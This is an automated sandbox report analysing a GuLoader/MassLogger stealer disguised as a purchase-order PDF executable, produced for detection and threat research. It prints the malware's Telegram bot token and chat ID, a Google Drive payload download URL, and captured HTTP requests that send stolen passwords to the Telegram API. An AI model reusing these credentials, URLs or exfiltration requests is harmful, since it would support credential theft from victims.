Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASE ORDER TRC-090971819130-24_pdf.exe

Overview

General Information

Sample name:PURCHASE ORDER TRC-090971819130-24_pdf.exe
Analysis ID:1578319
MD5:745504717878bb22b600df7e2c2dd9f4
SHA1:9515d0277803511a4f401674f40f022ed69c85d7
SHA256:8a4d38092e7f0245aa376d724cf3dbe08d4b563a86db3c99e70defaa38beb969
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2205388503.0000000002BCC000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: PURCHASE ORDER TRC-090971819130-24_pdf.exe PID: 4796JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T15:29:42.161159+010020577441Malware Command and Control Activity Detected192.168.2.549756149.154.167.220443TCP
            2024-12-19T15:29:45.902560+010020577441Malware Command and Control Activity Detected192.168.2.549766149.154.167.220443TCP
            2024-12-19T15:29:49.397276+010020577441Malware Command and Control Activity Detected192.168.2.549776149.154.167.220443TCP
            2024-12-19T15:29:52.938425+010020577441Malware Command and Control Activity Detected192.168.2.549785149.154.167.220443TCP
            2024-12-19T15:29:56.563595+010020577441Malware Command and Control Activity Detected192.168.2.549796149.154.167.220443TCP
            2024-12-19T15:30:00.031933+010020577441Malware Command and Control Activity Detected192.168.2.549806149.154.167.220443TCP
            2024-12-19T15:30:08.989401+010020577441Malware Command and Control Activity Detected192.168.2.549827149.154.167.220443TCP
            2024-12-19T15:30:21.477445+010020577441Malware Command and Control Activity Detected192.168.2.549859149.154.167.220443TCP
            2024-12-19T15:30:25.990535+010020577441Malware Command and Control Activity Detected192.168.2.549871149.154.167.220443TCP
            2024-12-19T15:30:30.719693+010020577441Malware Command and Control Activity Detected192.168.2.549883149.154.167.220443TCP
            2024-12-19T15:30:34.215299+010020577441Malware Command and Control Activity Detected192.168.2.549893149.154.167.220443TCP
            2024-12-19T15:30:37.686699+010020577441Malware Command and Control Activity Detected192.168.2.549904149.154.167.220443TCP
            2024-12-19T15:30:42.399185+010020577441Malware Command and Control Activity Detected192.168.2.549917149.154.167.220443TCP
            2024-12-19T15:30:45.840863+010020577441Malware Command and Control Activity Detected192.168.2.549925149.154.167.220443TCP
            2024-12-19T15:30:50.316155+010020577441Malware Command and Control Activity Detected192.168.2.549937149.154.167.220443TCP
            2024-12-19T15:30:53.779170+010020577441Malware Command and Control Activity Detected192.168.2.549947149.154.167.220443TCP
            2024-12-19T15:30:57.250331+010020577441Malware Command and Control Activity Detected192.168.2.549955149.154.167.220443TCP
            2024-12-19T15:31:01.789509+010020577441Malware Command and Control Activity Detected192.168.2.549967149.154.167.220443TCP
            2024-12-19T15:31:07.086493+010020577441Malware Command and Control Activity Detected192.168.2.549979149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T15:29:31.912821+010028032742Potentially Bad Traffic192.168.2.549733132.226.247.7380TCP
            2024-12-19T15:29:40.006658+010028032742Potentially Bad Traffic192.168.2.549733132.226.247.7380TCP
            2024-12-19T15:29:43.850430+010028032742Potentially Bad Traffic192.168.2.549761132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T15:29:23.912768+010028032702Potentially Bad Traffic192.168.2.549713216.58.208.238443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe.4796.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeReversingLabs: Detection: 55%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3D1EC CryptUnprotectData,3_2_32B3D1EC
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3D9D9 CryptUnprotectData,3_2_32B3D9D9
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49738 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_004027FB FindFirstFileW,3_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00406398 FindFirstFileW,FindClose,3_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B30671h3_2_32B303AF
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3C985h3_2_32B3C638
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B31042h3_2_32B30C28
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3DD40h3_2_32B3DA9C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3EEA0h3_2_32B3EBF7
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3E5F0h3_2_32B3E339
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3B339h3_2_32B3B07F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3F2F8h3_2_32B3F042
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3C499h3_2_32B3C1E0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3BBE9h3_2_32B3B930
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3E198h3_2_32B3DEE1
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3EA48h3_2_32B3E79F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B31042h3_2_32B30F6F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3B791h3_2_32B3B4EC
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B31042h3_2_32B30C1A
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 32B3C041h3_2_32B3BD88
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then push 00000000h3_2_3593BDF0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 3593882Dh3_2_35938650
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 359391B7h3_2_35938650
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35935058h3_2_35934DB0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35932808h3_2_35932560
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35931F58h3_2_35931CB0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35937770h3_2_359374C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35936EC0h3_2_35936C18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 359316A8h3_2_35931400
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35931250h3_2_35930FA8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35936A68h3_2_359367C0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 359361B8h3_2_35935F10
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35934218h3_2_35933F70
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35933968h3_2_359336C0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 359330B8h3_2_35932E10
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35935908h3_2_35935660
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_35938193
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35932C60h3_2_359329B8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 359323B0h3_2_35932108
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then push 00000000h3_2_3593C92F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35934ACAh3_2_35934820
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35931B00h3_2_35931858
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35937318h3_2_35937070
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35934670h3_2_359343C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_3593CBE7
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35933DC0h3_2_35933B18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_35937B52
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_35938373
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35936610h3_2_35936368
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35935D60h3_2_35935AB8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 359354B0h3_2_35935208
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then jmp 35933510h3_2_35933268
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then push 00000000h3_2_35E6E7C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]3_2_35E6F5D8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 4x nop then push 00000000h3_2_35E6F316

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49776 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49766 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49756 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49785 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49917 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49937 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49859 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49871 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49806 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49796 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49947 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49827 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49893 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49904 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49967 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49979 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49883 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49925 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd200fa9571766Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd203f031927acHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd206889082f42Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd209070a17673Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20bd9321f276Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20e9132498beHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2152005f10cfHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21e32c16b31aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd222049205566Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd226c5ec256a2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd22ac5e509c19Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd22f9f12f692dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd236cd1f171f8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd23e52094dd2bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd24984b8325b7Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd252256b0581fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd25bb05fd59f6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd26d9ff1bf1b4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd27d060a159d9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49761 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49713 -> 216.58.208.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
